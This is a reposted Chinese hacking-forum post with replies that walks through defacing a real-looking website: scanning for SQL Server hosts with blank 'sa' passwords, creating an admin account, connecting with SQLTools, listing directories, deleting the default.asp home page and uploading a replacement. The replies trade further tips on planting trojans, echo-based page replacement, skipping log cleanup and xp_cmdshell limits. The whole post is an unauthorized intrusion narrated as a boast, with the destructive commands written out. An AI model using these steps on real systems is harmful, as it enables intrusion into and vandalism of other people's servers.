[转载]用SQLTools轻松替换对方主页
文章作者:fhod请一夜无聊!和H.U.N联盟的几个兄弟侃。开着win2000自动攻击探测器。喝杯咖啡先!没多久结果就出来了!扫出的还倒不少哦!随便拿一个来看看把!这里就不多列了。
主机:222.65.152.122
SQL漏洞:
sa帐号密码为空。
主机:222.65.152.166
SQL漏洞:
sa帐号密码为空。
建立系统管理员帐号(shanlu)成功。
打开SQLTools连接222.65.152.122。!!提示连接不成功!郁闷!呵呵~~~不怕,还有呢!换一个!
222.65.152.166 OK!连接成功!相信大多数人都用过SQLTools这个工具把。功能我就不怎么介绍了! 既然他有SQL漏洞,一定有主页把!在IE里输入[url]http://222.65.152.166[/url] 晕了!主页里既然什么都没,就那么一句话"欢迎来到某某主页"。嘎嘎!我们来帮他把主页做完整把!大家注意!下面更精彩!
先用SQLTools执行 DOS命令!
C:\>DIR C:\
驱动器 C 中的卷是 Dell Server
卷的序列号是 A090-60E1
C:\ 的目录
2003-05-28 08:48 <DIR> Dell
2003-05-28 14:15 <DIR> Documents and Settings
2003-05-28 14:18 194,656 DOMSA_SETUP.LOG
2004-05-12 13:33 <DIR> Downloads
1995-08-12 10:51 45,675 HD.EXE
2003-06-06 11:13 <DIR> Inetpub
2003-05-30 18:11 <DIR> Korapps
2004-04-12 02:15 56 lost2.txt
2004-03-17 21:37 14,629 odbcconf.log
2004-08-31 17:57 <DIR> Program Files
2003-05-30 18:20 <DIR> SP
2004-03-17 21:11 <DIR> sql2ksp3
2004-09-06 08:01 <DIR> temp
2004-09-07 01:02 <DIR> WINNT
2003-10-24 11:47 <DIR> WUTemp
HOHO~~~看见什么没有! Inetpub
现在在看看他文件里是什么。
2003-06-06 11:13 <DIR> .
2003-06-06 11:13 <DIR> ..
2003-05-28 01:05 <DIR> AdminScripts
2003-09-24 12:37 <DIR> ftproot
2003-05-28 01:05 <DIR> iissamples
2003-05-28 14:07 <DIR> mailroot
2003-06-14 14:46 <DIR> scripts
2004-09-10 01:05 <DIR> wwwroot
接着DIR C:\Inetpub\wwwroot
在wwwroot目录下发现了一个default.asp文件,这个就是默认的主页文件了。现在我们来替换他的主页。怎么替换呢!!!!!!!我们也没他的shell,又没开他端口。而且连个webshell也没有。难道我们就什么办法都没了吗! 当然不是!要不我也不会写这篇文章了!
SQLTools就为我们提供了一个好东东!就是上传文件功能。我们在被地编译一个index.htm或者default.asp都可以,只要是默认主页的文件名就行。
现在还不要上传呢!我们还需要一个DOS命令。首先我们要把他的主页文件给删除了才行啊!
del C:\Inetpub\wwwroot\default.asp
为了确认有没删除,再用dir C:\Inetpub\wwwroot\看一下!
2004-09-10 01:05 <DIR> .
2004-09-10 01:05 <DIR> ..
1999-06-03 10:13 342 help.gif
1999-12-16 03:44 1,628 iisstart.asp
2003-05-28 14:07 <DIR> images
2003-07-08 16:45 <DIR> Inc
2003-07-09 09:23 2,541 korchina.css
1999-12-16 03:44 6,566 localstart.asp
2003-08-01 11:00 <DIR> logicbox
1999-06-03 10:13 356 mmc.gif
1999-06-03 10:13 2,806 pagerror.gif
2003-08-01 11:00 <DIR> photo_web
2003-05-28 14:07 2,149 postinfo.html
1999-06-03 10:13 1,046 print.gif
1999-06-03 10:13 1,577 warning.gif
1999-06-03 10:13 1,182 web.gif
1999-06-03 10:13 4,670 win2000.gif
2003-05-28 14:07 <DIR> _private
2003-06-27 12:32 1,561 _vti_inf.html
2003-05-28 14:07 <DIR> _vti_log
确实没有了!删除成功!接着就是上传文件了。把我们本机的index.htm上传到对方C:\Inetpub\wwwroot下。(注意这里的保存文件在一定要是个完整的路径就是C:\Inetpub\wwwroot\index.htm)
OK~~!上传成功!最后在IE里刷新下[url]http://222.65.152.166/[/url] 呵呵~~~~看到么!主页已经被我给替换了!看下我的抓图!
HOHO~~~~好了!就不多说了!自在轮回那丫的又再说我做坏事呢!说起来他比我还要坏!
前一夜搞的比我还要多!嘎嘎!
本人也没什么多高深的技术!只是换了一种思路来替换对方的主页,也不用去益出开端口那么麻烦了。也不知道有没有人用过这个方法来黑站,但我可以保证这是我无聊的时候想着做的! 晕了。没想到FHOD的这篇稿子还存活着呢。。
哈哈。 [s:51] 没啥新意,才来看看,名气大不=技术好。失望。 [quote][b]下面是引用没事来看看于2005-11-11 21:01发表的:[/b]
没啥新意,才来看看,名气大不=技术好。失望。[/quote]
呵呵,觉得简单了?尖端的怕你又看不懂。
要是这么简单的都不会那还说什么很深的呢?
所以别看人家写了简单的东西就觉得人家没技术,还失望....
说句打击你的话,你还没权利对别人说失望两个字.(就不说你没资格了) 有了sa 那干什么不行
这文章没什么太大意义。 [quote][b]下面是引用sunwear于2005-11-12 10:37发表的:[/b]
有了sa 那干什么不行
这文章没什么太大意义。[/quote]
好象不一定哦!
有sa
可是什么也用不了
我碰过多了 [quote][b]下面是引用十四郎于2005-11-12 23:08发表的:[/b]
好象不一定哦!
有sa
.......[/quote]
那要看你会不会了 说实在的.这文章确实没多大技术含量.俺自己也承认.,这都一年前的文章了..那时候自己菜.啥都不会..随便写着玩的
没想到还存活着呢,,
也不知道冰血封情大哥从哪找来的. 我不会..................
其实所谓有价值没价值,得看对什么人而言喽!
反正我不会就对喽...................... 邪恶八进制论坛上真好看 [s:39]
特别是这两天,好热闹 [s:51]
还有好多马甲的说 我感觉吧。有时候工具太强大了也不好,容易冻结人的思路。
就比如这位兄弟都忘记了清理日制的说。
益出开端口最大的好处是不会在有些服务器留下脚印。那次老师上课讲如何防御,我故意气他,溢出一台,桌面放个文档,让他找日志。。。(没防火)
换做是我,还是选择放上马,操作方便些了。 [s:34] [s:34] .............................. 呵呵~ 还有一种就是用echo命令来替换主页! 也很常见! 这办法还真是简单,虽然没什么高新技术,但是给了我们些思路,和方向。 [s:45] SA的好多都是限制过了的,提示说是没有xp_cmdshell,或者没找到xpsql70.dll,或者没找到xplog70.dll.而且现在出来的解决这种问题的办法都不是全部能解决的,我试过几个,成功机率不是很大,当然也有可能是我个人的运气的问题了. 谢谢楼主提供文章,吸取经验 [s:45]
页:
[1]